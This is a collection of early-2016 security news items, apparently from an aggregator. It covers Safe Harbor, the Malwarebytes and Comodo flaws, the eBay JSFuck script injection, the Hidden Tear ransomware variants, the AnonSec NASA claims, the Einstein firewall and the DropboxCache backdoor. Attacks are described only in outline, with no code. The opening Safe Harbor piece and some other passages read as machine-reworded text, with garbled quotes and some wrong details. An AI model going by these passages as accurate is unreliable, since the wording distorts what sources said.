“We request that Europe’s National data protection authorities DPAs to view this sign from the European Commission as an indication conviction and to hold off with any potential implementation activity until the new arrangement has been completely executed,” said John Higgins, executive general of industry pressure DigitalEurope.
“While they are evaluating the swap for Safe Harbor, we urge Europe’s DPAs to keep on regarding the utilization of other transfer systems, for example, contract clauses (MCCs) and binding corporate rules (BCRs), so information exchanges to the United States can proceed unrestricted.”
But then again there are as of now inquiries being raised about the new arrangement. The language utilized as a part of the official declaration is woolly, best case scenario and there are reasons for alarm that the arrangement struck might be excessively broad for a few, making it impossible to swallow.
safe harbor
“The aftereffects of months of intervention seems weak, and if implemented we are expected to see additional legal trial in the European courts,” stated Ashley Winton, UK head of data protection and privacy at Paul Hastings LLP.
“The European Commission still needs to put forth the case that the United States arrangements of protection laws are basically identical, that data subjects have genuine rights against unbalanced handling in the United States, and that if there is illegal processing then people can have their own information erased and at last change in a appropriate court.”
“With all due appreciation, however a few letters by the Obama organization is in no way, shape or form a legal base to ensure the basic rights of five hundred million European clients over the long run, when there is clear US law permitting mass surveillance,” stated Max Schrems, the Austrian student who bring down the Safe Harbor agreement for a case against Facebook.
“We don’t have the clear idea about the legal structure, yet this could clearly neglect the Court’s verdict. The Court has simply indicated that the United States needs to “guarantee” appropriate security by means of international commitments or domestic law. I question that a European can go to a United States court and claim his basic rights.”
He indicated that the arrangement could likewise come unstuck because of the NSA‘s PRISM plan, which permits the intelligence agencies to take advantage of the data streams for partners such as Microsoft, Google, Apple or Facebook. This would seem to break the contract and the courts are sure to get involved.
There’s additionally the matter of legitimate workarounds. At present Microsoft is battling the United States Department of Justice over the agency’s claims that it can summon data on European servers without a warrant.
Malwarebytes hardly working to fix flaws in its antivirus
4.2.2016 Vulnerebility
The Antivirus firm Malwarebytes is spending a significant effort to fix serious vulnerabilities in its defense solution that was reported by the experts at the Google’s Project Zero team.
The experts at Project Zero discovered that updates for Malwarebytes Antivirus were not digitally signed or downloaded over a secure HTTP connection, opening the user to Man-In-The-Middle attacks. An attacker could manipulate the updates hacking the Antivirus solutions.
Google Project Zero reported the vulnerabilities to Malwarebytes in November, waiting for 90 days before publicly disclosing the vulnerability.
malwarebytes anti-malware
The experts at Malwarebytes were not able to solve the problem in the 90-day period, so the researcher Tavis Ormandy published the details of the security issue.
“Malwarebytes fetches their signature updates over HTTP, permitting a man-in-the-middle attack,” he explained in a blog post.
“Therefore, this scheme is not sufficient to prevent tampering, and the developer should sign them. There are numerous simple ways to turn this into code execution, such as specifying a target file in the network configuration, writing a new TXTREPLACE rule to modify configuration files, or modifying a registry key with a REPLACE rule.”
The Chief executive at MalwareBytes, Marcin Kleczynski, admitted the difficulties in solving the problem, preannouncing many other weeks to fix the problem.
“In early November, a well-known and respected security researcher by the name of Tavis Ormandy alerted us to several security vulnerabilities in the consumer version of Malwarebytes Anti-Malware. Within days, we were able to fix several of the vulnerabilities server-side and are now internally testing a new version (2.2.1) to release in the next 3-4 weeks to patch the additional client-side vulnerabilities. At this time, we are still triaging based on severity.” he said in a blog post. The research seems to indicate that an attacker could use some of the processes described to insert their own code onto a targeted machine. Based on the findings, we believe that this could only be done by targeting one machine at a time.” .
Kleczynski took the opportunity to launch the Malwarebytes Bug Bounty program which will help the company to early discover any flaw in their software and to “encourage other security researchers to responsibly disclose vulnerabilities in Malwarebytes software.”
“I’d also like to take this opportunity to apologise. While these things happen, they shouldn’t happen to our users.”
Europol, a new move against terrorism and money laundering
4.2.2016 Safety
The Europol is increasing its efforts against terrorism, it has joined forces with EU to fight terrorist financing and money laundering.
Since 1 January 2016, Europol has increased the level of integration among the nodes of the decentralised computer network of the European Union Member States’ Financial Intelligence Units (FIUs), the FIU.net.
“FIU.NET is a decentralised computer network supporting the FIUs in the European Union in their fight against Money Laundering and Terrorist Financing. Decentralised meaning, that there is no central database in one specific Member State where all the exchanged data is stored. When sending the information from one FIU to another, the exchanged data is only and safely stored on the FIU.NET databases at the premises of the FIUs involved in the exchange.” states the description on the website of the FIU network.
The initiative wants to create more synergy between financial and criminal intelligence agencies in the EU, a measure necessary to fight the constant growth of the criminal syndicates and the terrorism in Europe.
“Under the auspices of the EU FIU platform and the renewed provisions set in the IV anti-money laundering Directive, the embedment of FIU.net into Europol aims to create more synergy between financial and criminal intelligence, ultimately boosting efforts to fighting organised crime and terrorism in the EU.” states the official announcement issued by the Europol.
FIU.net was established in 2002 and was co-financed until 2015 by the European Commission, it is an organism created to monitor money laundering activities and terrorist financing. Its pillar is the information sharing between the Financial Intelligence Units. Each FIU has the task to monitor on financial transactions, in particular every transfer of money from entities in different states.
The implementation of a decentralised network implies that only the information shared between two Financial Intelligence Units is securely stored in the FIU.net databases.
europol rob wainwright
The decision to embedment of FIU.net network in the Europol will enhance the exchange of financial intelligence. The information managed by the FIU.net architecture could be integrated with data managed by the Europol.
This is an important step against crime and terrorism, data from financial intelligence could be integrated with information related criminal intelligence activity conducted by the Europol, an important knowledge sustained with data provided by the Law Enforcement agencies of the EU countries.
“Thanks to the analytical capacities of Europol the suspicious money flows and their links to on-going terrorist and criminal activities can be further investigated. The FIU.net exchange platform will join other key Europol’s tools in the field such as the Terrorist Finance Tracking Program (TFTP), the Focal Point Sustrans (support to anti-money laundering investigations) and the network of the EU Asset Recovery Offices (AROs).” continues the Europol.
The decision of joining the efforts against terrorist financing activities is a necessary step to respond threats even more dangerous for every country in the EU and that are assuming a global connotation.
A week ago the director of Europol, Rob Wainwright, announced a new European Counter Terrorism Centre (ECTC) opening this month to fight the terrorism, it is easy to predict that this new structure will benefit also of the new strategic alliance.
Former DoE worker was hacking to steal nuclear secrets and resell them
4.2.2016 Hacking
A former Department of Energy (DoE) employee, Charles Harvey Eccleston [62], has been charged with trying to steal and sell nuclear secrets to foreign governments.
A former employee at the Department of Energy (DoE), Charles Harvey Eccleston [62], has pleaded guilty of cyber espionage. The man attempted to infect al least 80 colleagues at the DOE spreading a malware with the intent to gain control of the victims’ machines.
The man was operating to open the door to foreign hackers, allowing them to exfiltrate sensitive information related to nuclear weapons.
According to the US Department of Justice, Eccleston attempted unauthorized access and intentional damage to a protected computer.
“Charles Harvey Eccleston, 62, a former employee of the U.S. Department of Energy (DOE) and the U.S. Nuclear Regulatory Commission (NRC), pleaded guilty today to a federal offense stemming from an attempted e-mail “spear-phishing” attack in January 2015 that targeted dozens of DOE employee e-mail accounts.” reads the statement issued by officials with the US Department of Justice.
Eccleston worked for both the DOE and the US Nuclear Regulatory Commission, his deep knowledge of the environment allowed him to run surgical attacks against current employees. The employees received a highly targeted spear-phishing e-mails likely containing malicious links.
The man tried to resell information about his colleagues to foreign governments, prosecutors confirmed the case was discovered in 2013, after Eccleston visited an unnamed foreign embassy in Manila, Philippines and offered for sale more than 5,000 e-mail addresses of internal employees (i.e. Officials, engineers, and employees of a US government agency).
The agents from the FBI collected evidence on the man’s intent posing as embassy employees. The man was also offering the access to agency systems to advantage espionage activities.
doe
The man used emails that pretended to be sent by the organizations behind conferences related to nuclear energy.
“Thereafter, Eccleston met and corresponded with FBI undercover employees who were posing as representatives of the foreign country. During a meeting on Nov. 7, 2013, he showed one of the undercover employees a list of approximately 5,000 e-mail addresses that he said belonged to NRC employees. He offered to sell the information for $23,000 and said it could be used to insert a virus onto NRC computers, which could allow the foreign country access to agency information or could be used to otherwise shut down the NRC’s servers.”states the press release.” The undercover employee agreed to purchase a thumb drive containing approximately 1,200 e-mail addresses of NRC employees; an analysis later determined that these e-mail addresses were publicly available. The undercover employee provided Eccleston with $5,000 in exchange for the e-mail addresses and an additional $2,000 for travel expenses.”
“Over the next several months, Eccleston corresponded regularly by e-mail with the undercover employees. A follow-up meeting with a second undercover employee took place on June 24, 2014, in which Eccleston was paid $2,000 to cover travel-related expenses. During this meeting, Eccleston discussed having a list of 30,000 e-mail accounts of DOE employees. He offered to design and send spear-phishing e-mails that could be used in a cyber-attack to damage the computer systems used by his former employer.”
The FBI undercover agents provided a link to Eccleston to include in the malicious email. The man believed the link was pointing to a malicious domain used to serve a malware, instead, it was harmless. Altogether, the defendant sent the e-mail he believed to be infected to approximately 80 DOE employees located at various facilities throughout the country, including offices and laboratories associated with nuclear materials.
Eccleston was fired from the NRC in 2010 for unknown reason, and went to Davos City in the Philippines in 2011.
“Combating cyber-based threats to our national assets is one of our highest priorities,” Assistant Attorney General for National Security John P. Carlin said in a statement.
“We must continue to evolve our efforts and capabilities to confront cyber enabled threats and aggressively detect, disrupt and deter them.”
Eccleston was detained by Philippine law enforcement on March 27, and on Friday he will have the a court appearance on at the U.S. District Court of the District of Columbia.
According to the Justice Department, the man will remain detained until a hearing scheduled for May 20.
This type of crime provides a penalty of up to 10 years and financial penalties, but because the Eccleston age and previous records, according to the advisory federal sentencing guidelines, the former DOE worker likely to receive a prison term of 24 to 30 months and a fine of up to $95,000.
Latest Windows 10 May Have a Linux Subsystem Hidden Inside
3.2.2016 OS
A Few Months Back, Microsoft impressed the world with 'Microsoft loves Linux' announcements, including, development of a custom Linux-based OS for running Azure Cloud Switch and selecting Ubuntu as the operating system for its Cloud-based Big Data services.
Also Read: Microsoft Drops a Cloud Data Center Under the Ocean.
Now, a renowned Windows Hacker and computer expert, who goes by the name ‘WalkingCat’, discovered that the latest version of Windows 10 may have a Linux subsystem secretly installed inside.
According to his tweets, hacker spotted two mysterious files, LXss.sys and LXCore.sys, in the most latest Windows 10 Redstone Build 14251, which are suspected to be part of Microsoft’s Project Astoria.
windows-10-linux-subsystem
Project Astoria, also known as Windows Bridge for Android, is a toolkit that allows running Android apps on Windows 10 Mobile devices.
The naming convention for latest discovered files is very similar to the Android Subsystem files from Project Astoria, i.e. ADss.sys.
So, the "LX" in these name, however, can only be taken for one thing, and that is LINUX, which suggests the Windows 10 will have access to a Linux subsystem also.
Why a Linux Subsystem?
Since Windows 10 has been introduced as a Universal Operating system for all devices, so it might be possible that Microsoft wants to expand Project Astoria from mobile devices to desktop users.
If this comes to be true, adding a Linux subsystem will be beneficial in case Microsoft has plans to offer support for Linux applications, especially servers related technology and software.
Isn't this exciting?
Stay tuned to The Hacker News Facebook page for further developments on this topic.
Here's Why Microsoft Drops a Cloud Data Center Under the Ocean
3.2.2016 OS
Where tech companies like Facebook and Google prefer to move their data centers to colder countries to reduce their air conditioning bill, Microsoft has come up with an even better home for data centers while cutting high energy costs for cooling them: Under the Sea.
Here's what Microsoft says:
"50% of us live near the coast. Why doesn't our data?"
Building massive data centers underwater might sound crazy, but it is exactly something Microsoft is testing with its first submarine data center, dubbed Leona Philpot.
World's First Underwater Data Center
The testing is part of Microsoft’s plan dubbed Project Natick — an ongoing research project to build and run a data center that is submerged in the ocean, which the company believes, could make data centers faster, cost-effective, environmentally friendly and easier to set up.
Leona Philpot (named after the Halo character from Microsoft's Xbox) was tested last August, when engineers placed an enormous steel capsule a kilometer off the California coast, 30 feet underwater in the Pacific Ocean.
A single datacenter computing rack was placed in an eight-foot-wide steel capsule, which was covered in around 100 sensors to monitor every aspect of the underwater conditions: pressure, humidity, and, most importantly, motion.
The test ran from August to November last year (exactly 105 days) and the engineers said it was more successful than expected.
Why Underwater Data Center?
According to Microsoft, these are the main reasons for experimenting with underwater data centers:
1. Air conditioning cost is one of the biggest pain in running data centers. Traditional data centers are believed to consume up to 3 percent of the world's electricity.
So, placing the data centers in the ocean eliminated the need for cooling and will highly cut energy costs required to cool the heat generated by the racks upon racks of servers that process and store the world's digital lives.
2. Half of the world's population is located within 200 kilometers of the coast, so placing data centers in the sea would reduce latency – the time data takes to travel from its source to customers, which simply means faster delivery of data.
3. Reduce the time to build a data center from 2 Years to 90 Days. Microsoft believes that if it can mass produce the steel capsules, the company could build data centers in just 90 days.
This would make its operations cheaper and much quicker than the time needed to set a data center up on land.
Moreover, the capsules designed by the company would also adopt new, innovative rack designs that do not even need to consider human interaction.
4. Use of Renewable Energy. The project's engineers even believe that in future, underwater data centers might be able to power themselves by renewable energy, as in this case, perhaps underwater turbines or tidal power to generate electricity.
5. Environment-Friendly. Microsoft will also be tackling environmental concerns related to underwater data centers. The company says its current underwater data center prototype emits an "extremely" small amount of heat energy into the surrounding waters.
A Few Limitations:
Data centers on land are open for IT engineers to fix issues and replace servers whenever required, but the company wants its undersea data centers to go without maintenance for years at a time.
Since Microsoft doesn't have a team of Scuba engineers, each Natick data center unit would operate for over 5 years without maintenance and then it would be dragged up to the surface to have its internal parts replaced.
Other obvious risks for submarine data centers could be saltwater that is corrosive and weather that can also be a problem, to name just two potential hurdles.
Future Of The Data Center
The company started working on this idea in 2013, but the development of a physical prototype began in 2014 and August last year with its first ever submarine data server, Leona Philpot.
Since Microsoft's Project Natick has been in its "early days," it is hard to say when underwater data centers can actually adopted. However, Microsoft has plans to design a new version of underwater data centers that's three times larger than Leona Philpot.
It is not just Microsoft; many tech companies are considering new ways of housing data. In 2013, Facebook located one of its latest state-of-the-art data centers in Luleå, the far north of Sweden, to make use of cheap, renewable energy generated by hydroelectric schemes and outside air for cooling.
Comodo's so-called 'Secure Internet Browser' Comes with Disabled Security Features
3.2.2016 Security
Beware Comodo Users!
Have you Safeguarded your PC with a Comodo Antivirus? Then you need to inspect your system for privacy and security concerns.
First of all, make sure whether your default browser had been changed to "Chromodo" -- a free browser offered by Comodo Antivirus.
If your head node is "Yes," then you could be at risk!
Chromodo browser, which is supplied along with the installation of Comodo Anti-Virus Software and marketed as 'Private Internet Browser' for better security and privacy, automatically overrides system settings to set itself as your 'Default Browser.'
And secondly, the main security concern about Comodo Antivirus is that the Chromodo browser has 'Same Origin Policy' (SOP) disabled by default.
Google's security researcher Tavis Ormandy, recently shouted at Comodo for disabling SOP by default in its browser settings that violates one of the strongest browser security policy.
Ormandy notes that "all shortcuts are replaced with Chromodo links and all settings, cookies, etc are imported from Chrome. They also hijack DNS settings, among other shady practices."
Moreover, this is a total unethical movement to change default browser settings without users' knowledge.
Same Origin Policy (SOP) is one of the browser security policies that permits scripts running in a web browser to only make requests to pages on the same domain.
If enabled, Same Origin Policy will prevent malicious scripts on one page from obtaining access to sensitive data on another web page.
What If, Same Origin Policy is Disabled
chromodo-browser
To understand this, assume you are logged into Facebook and somehow visits a malicious website in another tab.
With SOP disabled, various malicious script files on that website could take over the control of your Facebook profile, allowing malicious actors to compromise your account with access to your private messages, post status updates, etc.
The same thing Comodo is doing with its users, by default disabling SOP in Chromodo that could allow attackers to:
Steal session authentication cookies.
Perform malicious actions through script code.
Even Replace trusted websites with attacker-created HTML design.
How to Check, If your Browser has SOP Enabled/Disabled
If you are still unsure whether your browser is SOP disabled, then visit this link.
If you are getting a prompt as "Browser appears to be fine," then you are out of danger.
But, if you are getting a negative approach such as "Your browser is not enforcing the SOP," you are advised to migrate to other browsers such as Chrome or Firefox for your self-defense against any malicious attack.
On Friday, United Nation can decide that Assange is being illegally detained
3.2.2016 BigBrothers
On Friday the United Nation can decide that Assange is being illegally detained, in this case the UK and Sweden must immediately release him.
The United Nations will reveal very soon the results of its investigation on the case of Julian Assange, the Wikileaks founder. WikiLeaks published secret information and classified media from anonymous sources. Wikileaks already published more than 10 million documents, Assange described its platform as “a giant library of the world’s most persecuted documents”
The decision is set to be announced next Friday 4 February, when the US would order the release of Assange.
Julian Paul Assange is an Australian journalist that founded Wikileaks in 2006, he is currently residing in the Ecuador embassy in London, after having been granted political asylum in August 2012.
Many ignore that Assange has a past as a hacker, in 1987 under the pseudonym Mendax he hacked many organizations with two colleagues known as “Trax” and “Prime Suspect.”
The list of victims is long and includes the Pentagon, the U.S. Navy, NASA, and Australia’s Overseas Telecommunications Commission; Citibank, Lockheed Martin, Motorola, Panasonic, and Xerox.
In 1996, he pleaded guilty to twenty-five charges and was ordered to pay reparations of A$2,100 and released on a good behavior bond.
Assange has been residing in the embassy since 2012 to avoid extradition, the popular journalist is facing sexual assault allegations in Sweden, meanwhile, the United States ask him to respond the accusation of cyber espionage for publishing classified US military and diplomat documents.
On September 2014, Julian Assange filed a complaint against Sweden and the United Kingdom, that has been considered by the UN Working Group on Arbitrary Detention.
We have to sit and wait for the decision on the Assanges’ case. If the and if the group will decide that the man is being illegally detained, the UN is expected to call on the UK and Sweden to release him.
“IF THE WGAD FINDS IN FAVOUR OF JULIAN ASSANGE — WHAT HAPPENS NEXT?
If the WGAD finds in Julian Assange’s favour, it will declare that Julian Assange is arbitrarily detained. In this case the UK and Sweden must immediately release and compensate him.”
A severe vulnerability affects eBay, be careful to phishing attacks
3.2.2016 Vulnerebility
Researchers from Check Point have discovered a flaw affecting the eBay platform that could allow attackers to launch phishing attacks against visitors.
A group of researchers from Check Point have discovered a vulnerability affecting the eBay online sales platform that could allow attackers to launch phishing attacks against visitors.
Visitors could be tricked into opening a page on the site that could expose them to phishing attacks, this is possible because the attacker could bypass the site’s code validation and execute malicious JavaScript on users via their browser, or mobile app.
The attack scenario is very simple, hackers can target eBay users by sending them a legitimate page that contains malicious code. By using social engineering the users can be tricked into opening the malicious page triggering the code execution, leading to multiple attack scenarios that range from phishing to binary download.
“Check Point has discovered a severe vulnerability in eBay’s online sales platform. This vulnerability allows attackers to bypass eBay’s code validation and control the vulnerable code remotely to execute malicious Java script code on targeted eBay users. If this flaw is left unpatched, eBay’s customers will continue to be exposed to potential phishing attacks and data theft.” states a blog post published by the company.
ebay flaw
The attacker would have to use JSF**k, a non-standard technique, in their description to pull the code. The researchers discovered that while eBay forbids users from including scripts and iFrames in descriptions by filtering it, the validation mechanism fails in the presence of JSF**k code.
What it the JSF**k?
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript that uses only six different characters,– []()!+, to write and execute code, this is the description reported in on the official website.
eBay doesn’t filter it allowing attackers to use it to launch the attack bypassing the validation mechanism in place.
“This allows the attacker to insert a remote controllable JavaScript that he can adjust to, for example, create multiple payloads for a different user agent,” Check Point writes, adding that an attacker could use it to trick a victim into downloading a malicious app or use the vulnerability to carry out phishing attacks.
The bad news it that the researchers reported the issue to eBay on Dec. 15 2015, but just two weeks ago the company replied that it had no plans to solve the problem.
“As we demonstrated to the eBay security team in the proof of concept, we were able to bypass their security policies and insert a malicious code to our seller page without any difficulty or restriction,” continues the post.
Cybersecurity Operational Tests And Assessments – US Defence can’t check F-35 data due to insecure systems
3.2.2016
Cybersecurity Operational Tests And Assessments conducted by the US Defence are essential to improve overall security … and discover that US Govt can’t check F-35 data due to insecure systems.
It is difficult to understand the importance of concept like information sharing when dealing with daily work, but officers at the Pentagon are learning at their own expense. The Pentagon is currently unable to check in on key maintenance of the F-35 joint strike fighter (JSF) because the data are stored in an insecure database managed by the Giant Lockheed Martin.
The precious information related to F-35 components and air-frame maintenance data is contained in the database that is non-compliant with August US Cyber Command security requirements, for this reason, the Government personnel cannot access the archive from government networks.
According to the “FY 2015 Annual Report for the Office of the Director, Operational Test & Evaluation,” the Government staff cannot access non-compliance systems via government networks for security reasons.
Michael Gilmore, Defense Department operational test and evaluation chief, also discovered a number of security issues affecting the Defence architectures, including misconfigured and unpatched systems, and poorly authentication process.
This is disconcerting is we consider the effort of the Department of Defense (DOD) in the Cybersecurity Operational Tests And Assessments In FY15.
“DOD cyber teams include organizations that provide OPFOR aggressors (Red Teams) as well as penetration testers and teams that perform other cybersecurity assessments (Blue Teams). DOT&E guidance establishes data and reporting requirements for cyber team involvement in both operational tests of acquisition systems and exercise assessments. The demand on DOD-certified Red Teams, which are the core of the cyber OPFOR teams, has increased significantly in the past 3 years.” states a report on cyber security and operational tests “In the same timeframe, the Cyber Mission Force and private sector have hired away members of Red Teams, resulting in staffing shortfalls at a time when demand is likely to continue to increase. This trend must be reversed if the DOD is to retain the ability to effectively train and assess DOD systems and Service members against realistic cyber threats.”
Despite the Defence is largely investing in operational tests, it often limits the red teams full scope to operate as opposing forces (OPFOR) during training because it fears possible effects.
“DOT&E believes the reluctance by Combatant Commands (CCMDs) and Services to permit realistic cyber effects during major exercises is due to the requirement to achieve numerous other training objectives in those exercises. Additionally, exercise authorities have stated they fear that cyber attacks could distract from—and possibly preclude—achieving these objectives. “
This is a totally wrong approach, threat actors would attack Defense and mission-critical systems by using any method and in any moment, it is important to stress systems in an attempt to find flaws before the intruders.
Gilmore explained that Defence red teams, read OPFOR (opposing forces in war games), are deployed in only the most security-savvy organisations.
“In order to attain a high state of mission readiness, CCMDs (Combatant Commands) and supporting defenders should conduct realistic tests and training that include cyber attacks and effects representative of those that advanced nation states would execute,” Gilmore writes.
Training effort and cyber security assessments are crucial to have an architecture resilient to cyber attacks, the US government is aware of this and has already planned cyber security tests in 2016.
Wikileak's Julian Assange Could Be Set Free On Friday by United Nation
2.2.2016
The decision of the United Nations investigation into the Julian Assange case is set to be revealed and could order the release of Wikileaks founder on February 5.
"BREAKING: UN set to announce decision on #Assange's release on Friday,"BREAKING: UN set to announce decision on #Assange's release on Friday," Wikileaks has tweeted.
Assange has been living in the Ecuadorian embassy in London for over 3 years, after being granted political asylum by the Ecuadorian government of the South American country.
Assange has been residing in the embassy since 2012 to avoid extradition:
First to Sweden where he is facing sexual assault allegations, which he has always denied.
Ultimately to the United States where he could face cyber espionage charges for publishing classified US military and diplomat documents via his website Wikileaks.
The leak of publishing secret documents has amounted to the largest information leak in United States history. The US also launched a criminal case against Assange following the leak.
However, Assange filed a complaint against Sweden and the United Kingdom in September 2014 that has been considered by the UN Working Group on Arbitrary Detention.
The decision on the case will be published on Friday, and if the group concludes that Assange is being illegally detained, the UN is expected to call on the UK and Sweden to release him.
Hidden tear and its spin offs
2.2.2016 Zdroj: Kaspersky
Background
A while ago Turkish security group Otku Sen created the hidden tear ransomware and published the source code online. Idea behind it was to “teach” security researchers how ransomware works. Right from the beginning the reaction of various security professionals was negative. And we were right, it didn’t take long before the first ransomware variants arrived based on the hidden tear source code ([1], [2]) and of course, things escalated a bit.
Wondering what else there was, I decided to analyze the samples in the Trojan-Ransom.MSIL.Tear class and was amazed to find 24 additional samples.
The spin offs
Hidden tear only encrypts files located on the user’s desktop in the “\test” directory. If such a directory doesn’t exist, then no files are encrypted and no harm is done. In one of the first samples we classified as hidden tear Trojan-Ransom.MSIL.Tear.c, they removed the “\test” directory, so in this case all the files (with a certain extension) located on the Desktop are encrypted.
Another sample, Trojan-Ransom.MSIL.Tear.f calls itself KryptoLocker. According to the message, public key cryptography was used, but when we look at the code, we see something different. The author also didn’t use a CnC this time, but asked the victims to e-mail him, so he could ask for the ransom.
The next variants, Trojan-Ransom.MSIL.Tear.g and Trojan-Ransom.MSIL.Tear.h , are the first versions that use a proper CnC (previous samples used a server with an internal IP address as the CnC server). Other samples, such as Trojan-Ransom.MSIL.Tear.i and Trojan-Ransom.MSIL.Tear.k share the same CnC, while Trojan-Ransom.MSIL.Tear.j uses another one.
Interesting is also Trojan-Ransom.MSIL.Tear.m. This variant is specifically looking for files located in the “Microsoft\Atom” directory.
Variants Trojan-Ransom.MSIL.Tear.n , Trojan-Ransom.MSIL.Tear.o, Trojan-Ransom.MSIL.Tear.p, Trojan-Ransom.MSIL.Tear.q, on the other hand just encrypt your files and doesn’t store the key anywhere.
Variants Trojan-Ransom.MSIL.Tear. r to Trojan-Ransom.MSIL.Tear.v are all more or less the same. The location of the c2 is often example.com. This of course does not work.
The last samples, Trojan-Ransom.MSIL.Tear.w, Trojan-Ransom.MSIL.Tear.x and Trojan-Ransom.MSIL.Tear.y all store the password on the hard drive and was also described earlier here.
Conclusion
As always, when malware gets open sourced, we see an increase in variants of that specific malware. We can therefore conclude that hidden tear completely missed its purpose. Researchers don’t need hidden tear to understand how ransomware works. Luckily enough, in this case, the copy cats didn’t fix the bugs in hidden tear. Therefore it is actually possible (with some computation) to recover your key and decrypt your files for free. More worrisome is when copy cats use well developed and sophisticated malware and start using that.
The samples discussed in this post were all samples that were not often spotted in the wild. This means the number of victims remains relatively low.
Nevertheless, bugs can be fixed and the malware can be enhanced without much effort. After this point, it is just waiting for future victims who might lose their files forever.
NASA HACKED! AnonSec tried to Crash $222 Million Drone into Pacific Ocean
2.2.2016
Once again the Red Alarm had been long wailed in the Security Desk of the National Aeronautics and Space Administration (NASA).
Yes! This time, a serious hacktivism had been triggered by the Hacking group named "AnonSec" who made their presence in the cyber universe by previous NASA Hacks.
The AnonSec Members had allegedly released 276 GB of sensitive data which includes 631 video feeds from the Aircraft & Weather Radars; 2,143 Flight Logs and credentials of 2,414 NASA employees, including e-mail addresses and contact numbers.
The hacking group has released a self-published paper named "Zine" that explains the magnitude of the major network breach that compromised NASA systems and their motives behind the leak.
Here’s How AnonSec Hacked into NASA
The original cyber attack against NASA was not initially planned by AnonSec Members, but the attack went insidious soon after the Gozi Virus Spread that affected millions of systems a year ago.
After purchasing an "initial foothold" in 2013 from a hacker with the knowledge of NASA Servers, AnonSec group of hackers claimed to pentested the NASA network to figure out how many systems are penetrable, the group told InfoWar.
Bruteforcing Admin's SSH Password only took 0.32 seconds due to the weak password policy, and the group gained further indoor access that allowed it to grab more login information with a hidden packet sniffing tool.
They also claimed to successfully infiltrate into the Goddard Space Flight Center, the Glenn Research Center, and the Dryden Research Center.
Hacker Attempted to Crash $222 Million Drone into the Pacific Ocean
Three NAS Devices (Network Attached Storage) which gathers aircraft flight log backups were also compromised, rapidly opening a new room for the extended hack:
Hacking Global Hawk Drones, specialized in Surveillance Operations.
Hackers have tried to gain the control over the drone by re-routing the flight path (by Man-in-the-Middle or MitM strategy) to crash it in the Pacific Ocean, but…
…the sudden notification of a security glitch in the unusual flight plan made the NASA engineers to take the control manually that saved their $222.7 Million drone from drowning in the ocean.
This hacking attempt had happened due to the trivial routine of drone operators of uploading the drone flight paths for the next fly, soon after a drone session ends.
After this final episode, AnonSec lost their control over the compromised NASA servers and everything was set to normal by NASA engineers as before.
This marked the attack's magnitude at a steep height by infecting into other pipelines of NASA, leading to this nasty situation.
However, in a statement emailed to Forbes, NASA has denied alleged hacking incident, says leaked information could be part of freely available datasets, and there is no proof that a drone was hijacked.
“Control of our Global Hawk aircraft was not compromised. NASA has no evidence to indicate the alleged hacked data are anything other than already publicly available data. NASA takes cybersecurity very seriously and will continue to fully investigate all of these allegations.”
Why Did AnonSec Hack into NASA?
If you are going to point your fingers against the AnonSec Hackers, then Wait! Here's what the group of hackers wants to highlight:
"One of the main purposes of the Operation was to bring awareness to the reality of Chemtrails/CloudSeeding/Geoengineering/Weather Modification, whatever you want to call it, they all represent the same thing."
"NASA even has several missions dedicated to studying Aerosols and their affects (sic) on the environment and weather, so we targeted their systems."
And Here's What NASA was actually doing:
Cloud seeding: A weather alteration method that uses silver iodide to create precipitation in clouds which results to cause more rainfall to fight carbon emission which ultimately manipulates the nature.
Geoengineering: Geoengineering aims to tackle climate change by removing CO2 from the air or limiting the sunlight reaching the planet.
Similar projects are running on behalf of the US Government such as Operation Icebridge [OIB], Aerosol-Cloud-Ecosystem (ACE) which are dedicated to climate modeling.
This security breach would be a black label for the Security Advisory Team of NASA and became a warning bell to beef up the security.
They Named it — Einstein, But $6 Billion Firewall Fails to Detect 94% of Latest Threats
2.2.2016
The US government's $6 Billion firewall is nothing but a big blunder.
Dubbed EINSTEIN, the nationwide firewall run by the US Department of Homeland Security (DHS) is not as smart as its name suggests.
An audit conducted by the United States Government Accountability Office (GAO) has claimed that the firewall used by US government agencies is failing to fully meet its objectives and leaving the agencies open to zero-day attacks.
EINSTEIN, which is officially known as the US' National Cybersecurity Protection System (NCPS) and has cost $5.7 Billion to develop, detects only 6 percent of today's most common security vulnerabilities and failed to detect the rest 94 percent.
How bad is EINSTEIN Firewall in reality?
In a series of tests conducted last year, Einstein only detected 29 out of 489 vulnerabilities across Flash, Office, Java, IE and Acrobat disclosed via CVE reports published in 2014, according to a report [PDF] released by the GAO late last year.
Among the extraordinary pieces of information revealed are the fact that the system is:
Unable to monitor web traffic for malicious content.
Unable to uncover malware in a system.
Unable to monitor cloud services either.
Only offers signature-based threat and intrusion detection, rather than monitoring for unusual activity.
Yes, Einstein only carries out signature-based threat and intrusion detection, which means the system acts like a dumb terminal that waits for the command what to find, rather than to search itself for unusual activity.
Einstein Uses Outdated Signatures Database
In fact, more than 65 percent of intrusion detection signatures (digital fingerprints of known viruses and exploit code) are outdated, making Einstein wide open to recently discovered zero-day vulnerabilities.
However, in response to this, DHS told the office Einstein was always meant to be a signature-based detection system only. Here's what the department told the auditors:
"It is the responsibility of each agency to ensure their networks and information systems are secure while it is the responsibility of DHS to provide a baseline set of protections and government-wide situational awareness, as part of a defense-in-depth information security strategy."
Einstein is Effectively Blind
If this wasn't enough to figure out the worth of the $6 Billion firewall, Einstein is effectively Blind.
The Department of Homeland Security (DHS), which is behind the development of Einstein, has not included any feature to measure the system's own performance, so the system doesn't even know if it is doing a good job or not.
So, "until its intended capabilities are more fully developed, DHS will be hampered in its abilities to provide effective cybersecurity-related support to federal agencies," reads the report.
Einstein was actually developed in 2003 to automatically monitor agency network traffic, and later in 2009 expanded to offer signature-based detection as well as malware-blocking abilities.
Most of the 23 agencies are actually required to implement the firewall, but the GAO found that only 5 of them were utilising the system to deal with possible intrusions.
Despite having spent $1.2 Billion in 2014 and $5.7 Billion in total project, Einstein still only monitors certain types of network flaws along with no support for monitoring web traffic or cloud services.
DropboxCache Backdoor, a new Cross-Platform threat
2.2.2016
Security experts at Kaspersky Lab have discovered a new Cross-Platform backdoor dubbed DropboxCache Backdoor ported from Linux to Window.
Security experts at Kaspersky Lab have discovered a new Cross-Platform backdoor dubbed DropboxCache (Backdoor.Linux.Mokes.a), initially affecting Linux systems and now migrated to Windows. The backdoor allows attackers to gain complete control over the victim’s machine, it also implements a capture audio feature. To achieve the portability of the DropboxCache backdoor, authors have used C++ and Qt, a common choice in the development community.
The experts at Kaspersky noticed that the authors didn’t put effort into implement obfuscating techniques, the analysis of the source code allowed investigators to find the IP address of the command and control (C&C) server hardcoded into the source code, the malware contact the server every minute.
